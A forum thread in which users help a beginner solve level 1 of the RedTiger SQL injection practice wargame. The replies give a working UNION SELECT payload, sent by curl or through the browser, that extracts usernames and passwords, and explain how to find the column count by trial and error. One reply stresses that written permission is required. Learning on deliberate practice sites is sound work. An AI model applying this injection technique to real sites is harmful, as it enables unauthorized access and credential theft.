Help with "Hacking"

Hello fellow tech users,

I have been trying to learn SQL injection and other forms of hacking recently, and I have come across some problems while trying to practice.

Can anybody help me out solve this hackit (I can’t even solve level one :frowning: )

The hackit can be found here: https://redtiger.labs.overthewire.org/

Thanks for helping in my ongoing quest to become the ultimate hacker,

1 Like

I’ll have to look up the SQL commands, but basically you want to trick the web form to submit raw SQL commands… and those commands will look up the password for you.

Something like “select ‘username’ ‘password’ from level1_users”

and read what it gives you.

You’ll probably want to use ‘curl’ to send the commands, rather than through your web browser.

Something like this:

curl --silent --insecure "https://redtiger.labs.overthewire.org/level1.php?cat=1%20union%20select%201,2,username,password%20from%20level1_users"

But it should work right in the browser too:

https://redtiger.labs.overthewire.org/level1.php?cat=1%20union%20select%201,2,username,password%20from%20level1_users

Take it from there :slight_smile:

you could use software like zaproxy (burpsuite is garbage), use active scanning to find sql injections (it just fuzzes the site) and use the method it detected and replace the current sql code with the sql code you want to run, i wouldnt know a lot about it though because im not into web application stuff.

Hey, something I want to stress, and I say it over and over again: penetration testing and this kind of “hacking” should only be done when you have written permission to do so.

In this case, the whole point of that website is to teach these skills. But trying this stuff on other websites will get you in trouble. Don’t do it.

Also, don’t call it ‘hacking.’ Unfortunately English has evolved that word into being a negative. But it wasn’t always that way… Hacker used to mean someone who solved problems creatively etc.

And a link that you should read through before you do anything else related to “hacking” :

https://www.eccouncil.org/code-of-ethics/

Hi Miguel,

I was not able to understand how did you figure out that you have to select 2 columns,because i tried it by using https://redtiger.labs.overthewire.org/level1.php?%20select%20*%20from%20level1_users and https://redtiger.labs.overthewire.org/level1.php?%20select%20username,password%20from%20level1_users
but i didn’t get any result.Could you please explain it in detail as i am new to web application security.

Thanks

1 Like

Try something like:

curl "https://redtiger.labs.overthewire.org/level1.php?cat=1%20union%20select%201,2,username,password%20from%20level1_users" 

or you can just load it in your web browser:

https://redtiger.labs.overthewire.org/level1.php?cat=1%20union%20select%201,2,username,password%20from%20level1_users

I used the union command to just combine both statements into one result.

1 Like

Hi Miguel,

Your method worked and i did understood the use of union.But how did you figure out that 1,2 id has to be selected?
thanks

Ah that’s the trial and error part. Try it with just 1, or with 1,2,3,4 etc. Until you get one that works.

You try and figure out how many columns the database has, etc. In this case, just two will work. The others don’t.